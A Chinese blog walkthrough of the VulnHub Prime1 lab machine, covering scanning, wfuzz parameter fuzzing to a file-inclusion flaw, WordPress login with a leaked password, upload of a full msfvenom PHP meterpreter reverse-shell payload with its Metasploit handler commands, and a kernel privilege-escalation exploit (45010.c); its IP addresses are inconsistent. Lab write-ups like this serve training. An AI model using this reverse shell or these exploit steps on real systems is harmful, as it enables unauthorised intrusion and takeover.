vulnhub Prime1 复现 简单易懂如果好请扣6

最新推荐文章于 2024-07-17 14:39:25 发布
最新推荐文章于 2024-07-17 14:39:25 发布
阅读量204 收藏
点赞数
分类专栏: 安全 渗透 文章标签: 网络 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67567251/article/details/127951705
版权

1、信息收集

1.1.1arp-scan扫描(指定网卡扫)

arp-scan -I eth0 -l 攻击端口为192.168.220.134

nmap扫描

dir路径扫描 访问这些路径没发现什么东西

dirb 192.168.220.134

扫描txt php zip文件 访问页面

访问页面提示用对php文件进行模糊测试最后访问location.txt得到提示那就先对index.php进行fuzz测试

使用wfuzz测试发现返回结果都一样

这样情况下我们可以加判定条件 --hw 12,得到关键字

拼接 file=location.txt

把关键字换成360 访问什么也没有这时候想起前面还有一个image.php

提示得到正确参数了这里没有提示试试linux命令语句

发现可行他说password.txt 文件在directory:/home/saket路径里拼接试试

得到密码follow_the_ippsec 在所有可以登录的地方都试了最后在http://192.168.220.134/wordpress/可以登录

http://192.168.220.134/wordpress/wp-login.php

用户名 victor

密码 follow_the_ippsec

2、漏洞利用

登录之后找到发现可以提交的

使用美少妇生成payload把它写入到文件上传的地方

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.220.134 lport=7777 -o shell.php

<?php /**/ error_reporting(0); $ip = '192.168.220.134'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

启动msf进行反弹链接msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.142.135

set lport 7777

exploit

访问这个地址

http://192.168.220.134/wordpress/wp-content/themes/twentynineteen/secret.php

3、权限提升

使用msf查看网页内核版本 16.04 4.10

使用 searchsploit 16.04 Ubuntu查看msf里面带的漏洞脚本

发现这个合适 运行这个提权脚本可以得到root权限

msf所有的脚本都早这个路径下 把这个里面的45010.c编译号上传到靶机里面

cd /usr/share/exploitdb/exploits/linux/local

把这个文件复制到root目录下然后gcc编译一下(-o指定编译位置)

cp 45010.c /root

gcc 45010.c -o 45010

把当前机器目录root/45010 上传到tmp/45010

发现文件只能读给他提权

进入shell模式没有回显给45010加权限

weixin_67567251
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场-Prime1
ad12456的博客
03-30 2841
靶场练习,
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
vulnhub Prime1渗透
qq_45455136的博客
03-09 910
Prime1靶场渗透准备环境主机发现端口扫描目录扫描FUZZ和LFIWordPress漏洞扫描Linux内核漏洞提权 准备环境 攻击机与靶机在同一网段下 攻击机:kali 192.168.37.130 靶机:Prime1 未知 主机发现 kali使用namp扫描,得到靶机ip 192.168.37.131 kali使用arp-scan扫描,得到靶机ip kali使用netdiscover扫描,得到靶机ip 端口扫描 kali使用nmap扫描靶机全部端口,发现开放了22端口ssh服务和80端口http
vulnhubPrime1
开心星人的博客
06-19 1414
打开靶机,是ubuntu操作系统。 想要登录需要输入密码 发现一行重要的信息 我们的目的是在不知道密码的情况下,拿到该靶机的root权限我们需要知道目标靶机的ip地址需要知道虚拟机NAT网络的网段 目标靶机就在192.168.88.1/24这个C段下攻击机kali也是NAT网络,所以kali也在当前C段(其实直接查看kali的ip地址就可以了,因为kali和靶机在一个网段) 一般扫出来主机号很小的(如1、2)和很大的(如255、254)都不去考虑192.168.88.132是kali的ip地址 所以靶机的
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1009
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
vulnhub prime1通关提权详细思路
m0_61506558的博客
09-24 752
本次模拟渗透测试的流程,从确定目标域名、IP 、主机发现,进行信息收集域名、IP、端口、目录扫描、搜索引擎、网络空间搜索引擎、Git…… 漏洞扫描,利用msf集成的工具,漏洞利用,最终拿到root用户。1、主机发现我的攻击机选择的是kali,在本机我们可以试试找它的网段,方便Nmap进行扫描,我本地使用的是NAT技术,这样我们就可以找到它的网段模式描述特点场景Bridge桥接虚拟机使用物理机的网卡(有线或者无线),不用虚拟网卡,占用一个IP,需要配置IP以后访问互联网。
Vulnhub-靶机-PRIME: 1
weixin_45042115的博客
10-03 1542
今天发现了一个有趣的靶机,加载到本地VMware Workstation工作站进行漏洞复现 靶机下载地址 https://www.vulnhub.com/entry/prime-1,358/ 对目标进行扫描发现开放端口信息 nmap -sS -sV -p- -T5 100.100.100.130 浏览器访问,并对其进行目录扫描 dirb 描目录发现了/wordpress目录和一些其他的页面 对wordpress进行扫描 wpscan--url http://rip/wordpress/ --
prime1--vulnhub靶场通关教程
m0_74402888的博客
04-29 1967
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
Vulnhub——prime1
m0_66638011的博客
06-14 730
Vulnhub是一个提供各种漏洞环境的靶场平台,旨在帮助安全爱好者提升渗透测试技能。靶场中的环境大多是预先设计好的虚拟机镜像文件,这些镜像中包含了多种漏洞,用户需要通过VMware或VirtualBox等虚拟化软件运行这些镜像。每个靶场镜像都有明确的目标,通常是获取操作系统的root权限和查看flag,即所谓的“Boot2root”挑战。prime1靶场攻破过程:1、我们进行信息收集,我们发现这个靶场最重要的就是信息收集方面,通过wpscan、wfuzz与目录扫描工具发现了用户名与密码’
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1660
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
prime-number-1.zip_prime
09-21
标题中的"prime-number-1.zip_prime"提示我们这个压缩包主要关注的是与素数相关的主题。素数是数学中一个非常基础且重要的概念,它是指大于1且仅能被1和自身整除的自然数,比如2、3、5、7、11等。在密码学、计算机...
vuInhub靶场实战系列-prime:1
06-05
vuInhub靶场实战系列-prime:1
prime95_pc6
12-29
1. **稳定性测试**:Prime95的主要功能是进行CPU稳定性测试,它通过执行复杂的素数搜索算法(即寻找大素数)来考验CPU的极限性能。这种测试可以暴露CPU在高负荷运行时可能存在的问题,如过热、内存错误等。 2. **...
E-prime 1 简明使用说明
10-30
E-prime 1.0 的简明使用说明,可以用来做一些行为实验。
SpringBoot整合SSE,实现后端主动推送DEMO
最新发布
zjy660358的专栏
07-17 351
说起服务端主动推送,大家第一个想到的一定是WEBSOCKET。作为软件工程师,不能无脑使用一种技术,要结合实际情况,择优选取。SSE(Server-Sent Events)相比于WEBSOCKET1、轻量化、兼容性 基于传统的HTTP协议,所以浏览器兼容性比较好2、 只支持单向通讯。(服务器->客户端)
27_MobileNetV3网络详解
https://github.com/foxpup11?tab=repositories
07-17 816
https://www.bilibili.com/video/BV1GK4y1p7uE/?spm_id_from=333.999.0.0&vd_source=7dace3632125a1ef7fd32c285eb2fbac
RTI DDS大数据碎片
qq_33089547的博客
07-17 983
PublicationBuiltingTopicData或SubscriptionBuiltnTopicData样本较大的最常见原因是序列化的TypeCode或TypeObject,但您也可能发送了大量属性(通过7.5.19 PROPERTY QosPolicy(DDS扩展))或具有较大的ContentFilteredTopic筛选器表达式,以及其他大小可变的字段,这可能会导致样本大小较大。如果您尝试发送一个大小大于MTU的DDS样本,但尚未设置DDS级碎片,您将看到IP级碎片。
Internet 控制报文协议 —— ICMPv4 和 ICMPv6 详解
u013669912的博客
07-17 888
int is_prime=1;
07-15
这段代码声明了一个名为 `is_prime` 的整型变量,并将其初始化为 1。通常情况下,我们用来表示布尔值的变量名会使用 `bool`型,而不是整型。但是,由于 C 语言没有原生的布尔类型,因此可以使用整型变量来表示布尔值...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值